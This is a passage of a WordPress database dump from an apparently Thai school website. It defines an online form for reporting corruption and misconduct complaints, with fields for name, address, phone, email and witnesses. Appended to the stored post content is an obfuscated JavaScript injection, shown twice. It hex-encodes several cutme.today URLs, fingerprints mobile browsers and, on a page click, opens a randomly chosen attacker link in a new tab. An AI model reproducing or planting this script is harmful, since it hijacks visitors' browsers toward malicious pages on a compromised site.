|o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ','','inherit','closed','closed','','474-revision-v1','','','2024-08-02 11:28:28','2024-08-02 04:28:28','',474,'http://pakhaeng.ssk.in.th/?p=480',0,'revision','',0),
(481,1,'2024-08-02 11:29:25','2024-08-02 04:29:25','{\"fields\":{\"2\":{\"id\":\"2\",\"type\":\"name\",\"label\":\"\\u0e0a\\u0e37\\u0e48\\u0e2d-\\u0e2a\\u0e01\\u0e38\\u0e25 \\u0e1c\\u0e39\\u0e49\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"format\":\"first-last\",\"description\":\"\\u0e0a\\u0e37\\u0e48\\u0e2d-\\u0e19\\u0e32\\u0e21\\u0e2a\\u0e01\\u0e38\\u0e25 \\u0e1c\\u0e39\\u0e49\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"3\":{\"id\":\"3\",\"type\":\"textarea\",\"label\":\"\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48\",\"description\":\"\\u0e40\\u0e0a\\u0e48\\u0e19 94 \\u0e2b\\u0e21\\u0e39\\u0e48  6 \\u0e15\\u0e33\\u0e1a\\u0e25\\u0e42\\u0e1e\\u0e18\\u0e34\\u0e4c  \\u0e2d\\u0e33\\u0e40\\u0e20\\u0e2d\\u0e42\\u0e19\\u0e19\\u0e04\\u0e39\\u0e13 \\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e31\\u0e14\\u0e28\\u0e23\\u0e35\\u0e2a\\u0e30\\u0e40\\u0e01\\u0e29 33250\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"number\",\"label\":\"\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e17\\u0e23\\u0e28\\u0e31\\u0e1e\\u0e17\\u0e4c (\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49)\",\"description\":\"\\u0e15\\u0e31\\u0e27\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07 : 08x-xxx-xxxx\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"5\":{\"id\":\"5\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\\u0e01\\u0e23\\u0e38\\u0e13\\u0e32\\u0e43\\u0e2a\\u0e48 \\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":false,\"filter_type\":\"\",\"allowlist\":\"\",\"denylist\":\"\",\"css\":\"\"},\"6\":{\"id\":\"6\",\"type\":\"name\",\"label\":\"\\u0e0a\\u0e37\\u0e48\\u0e2d-\\u0e19\\u0e32\\u0e21\\u0e2a\\u0e01\\u0e38\\u0e25 \\u0e1c\\u0e39\\u0e49\\u0e16\\u0e39\\u0e01\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"7\":{\"id\":\"7\",\"type\":\"select\",\"label\":\"\\u0e15\\u0e33\\u0e41\\u0e2b\\u0e19\\u0e48\\u0e07\",\"choices\":{\"1\":{\"default\":\"1\",\"label\":\"\\u0e1c\\u0e39\\u0e49\\u0e2d\\u0e33\\u0e19\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e42\\u0e23\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"2\":{\"label\":\"\\u0e04\\u0e23\\u0e39\\u0e1c\\u0e39\\u0e49\\u0e2a\\u0e2d\\u0e19\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"3\":{\"label\":\"\\u0e40\\u0e08\\u0e49\\u0e32\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e18\\u0e38\\u0e23\\u0e01\\u0e32\\u0e23\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"4\":{\"label\":\"\\u0e19\\u0e31\\u0e01\\u0e01\\u0e32\\u0e23\\u0e20\\u0e32\\u0e23\\u0e42\\u0e23\\u0e07\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"description\":\"\",\"required\":\"1\",\"style\":\"classic\",\"size\":\"medium\",\"placeholder\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"9\":{\"id\":\"9\",\"type\":\"text\",\"label\":\"\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"description\":\"\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"8\":{\"id\":\"8\",\"type\":\"textarea\",\"label\":\"\\u0e23\\u0e32\\u0e22\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e35\\u0e22\\u0e14\",\"description\":\"\\u0e23\\u0e32\\u0e22\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e35\\u0e22\\u0e14 \\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"},\"10\":{\"id\":\"10\",\"type\":\"checkbox\",\"label\":\"\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23 \\/ \\u0e2b\\u0e25\\u0e31\\u0e01\\u0e10\\u0e32\\u0e19\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e15\\u0e34\\u0e21 (\\u0e16\\u0e49\\u0e32\\u0e21\\u0e35) \\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e08\\u0e31\\u0e14\\u0e2a\\u0e48\\u0e07\\u0e44\\u0e14\\u0e49\\u0e17\\u0e32\\u0e07 E-mail : 33010169@sisaketedu1.go.th\",\"choices\":{\"1\":{\"label\":\"\\u0e21\\u0e35\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"2\":{\"label\":\"\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"choices_images_style\":\"modern\",\"choices_icons_color\":\"#066aab\",\"choices_icons_size\":\"large\",\"choices_icons_style\":\"default\",\"description\":\"\",\"required\":\"1\",\"input_columns\":\"\",\"choice_limit\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"11\":{\"id\":\"11\",\"type\":\"text\",\"label\":\"\\u0e1e\\u0e22\\u0e32\\u0e19\\/\\u0e1a\\u0e38\\u0e04\\u0e04\\u0e25\\u0e2d\\u0e49\\u0e32\\u0e07\\u0e2d\\u0e34\\u0e07\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"12\":{\"id\":\"12\",\"type\":\"number\",\"label\":\"\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e17\\u0e23\\u0e28\\u0e31\\u0e1e\\u0e17\\u0e4c \\u0e1e\\u0e22\\u0e32\\u0e19\\/\\u0e1a\\u0e38\\u0e04\\u0e04\\u0e25\\u0e2d\\u0e49\\u0e32\\u0e07\\u0e2d\\u0e34\\u0e07\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"14\":{\"id\":\"14\",\"type\":\"name\",\"label\":\"\\u0e0a\\u0e37\\u0e48\\u0e2d-\\u0e2a\\u0e01\\u0e38\\u0e25 (\\u0e1e\\u0e22\\u0e32\\u0e19\\/\\u0e1a\\u0e38\\u0e04\\u0e04\\u0e25\\u0e2d\\u0e49\\u0e32\\u0e07\\u0e2d\\u0e34\\u0e07)\",\"format\":\"first-last\",\"description\":\"\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"15\":{\"id\":\"15\",\"type\":\"checkbox\",\"label\":\"\\u0e02\\u0e49\\u0e32\\u0e1e\\u0e40\\u0e08\\u0e49\\u0e32\\u0e02\\u0e2d\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e27\\u0e48\\u0e32\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e23\\u0e30\\u0e01\\u0e32\\u0e23 \\u0e2b\\u0e32\\u0e01\\u0e1b\\u0e23\\u0e32\\u0e01\\u0e0e\\u0e27\\u0e48\\u0e32\\u0e44\\u0e21\\u0e48\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e02\\u0e49\\u0e32\\u0e1e\\u0e40\\u0e08\\u0e49\\u0e32\\u0e22\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14 \\u0e41\\u0e25\\u0e30\\u0e43\\u0e2b\\u0e49\\u0e14\\u0e33\\u0e40\\u0e19\\u0e34\\u0e19\\u0e01\\u0e32\\u0e23\\u0e15\\u0e32\\u0e21\\u0e01\\u0e0e\\u0e2b\\u0e21\\u0e32\\u0e22\",\"choices\":{\"1\":{\"label\":\"\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e02\\u0e49\\u0e2d\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"choices_images_style\":\"modern\",\"choices_icons_color\":\"#066aab\",\"choices_icons_size\":\"large\",\"choices_icons_style\":\"default\",\"description\":\"\",\"required\":\"1\",\"input_columns\":\"\",\"choice_limit\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"}},\"id\":\"474\",\"field_id\":16,\"settings\":{\"form_title\":\"\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e41\\u0e08\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e01\\u0e32\\u0e23\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e41\\u0e25\\u0e30\\u0e1b\\u0e23\\u0e30\\u0e1e\\u0e24\\u0e15\\u0e34\\u0e21\\u0e34\\u0e0a\\u0e2d\\u0e1a\",\"form_desc\":\"\",\"submit_text\":\"\\u0e2a\\u0e48\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"33010169@sisaketedu1.go.th\",\"subject\":\"New \\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e41\\u0e08\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e01\\u0e32\\u0e23\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e41\\u0e25\\u0e30\\u0e1b\\u0e23\\u0e30\\u0e1e\\u0e24\\u0e15\\u0e34\\u0e21\\u0e34\\u0e0a\\u0e2d\\u0e1a Entry\",\"sender_name\":\"\\u0e42\\u0e23\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e1a\\u0e49\\u0e32\\u0e19\\u0e2b\\u0e19\\u0e2d\\u0e07\\u0e1b\\u0e25\\u0e32\\u0e40\\u0e02\\u0e47\\u0e07-\\u0e01\\u0e2d\\u0e44\\u0e2b\\u0e25\\u0e48\",\"sender_address\":\"33010169@sisaketedu1.go.th\",\"replyto\":\"\",\"message\":\"{all_fields}\",\"template\":\"\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us! We will be in touch with you shortly.<\\/p>\",\"message_scroll\":\"1\",\"page\":\"459\",\"redirect\":\"\"}},\"antispam\":\"1\",\"anti_spam\":{\"time_limit\":{\"duration\":\"3\"}},\"form_tags\":[],\"store_spam_entries\":\"0\"},\"search_terms\":\"\",\"meta\":{\"template\":\"blank\"}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return 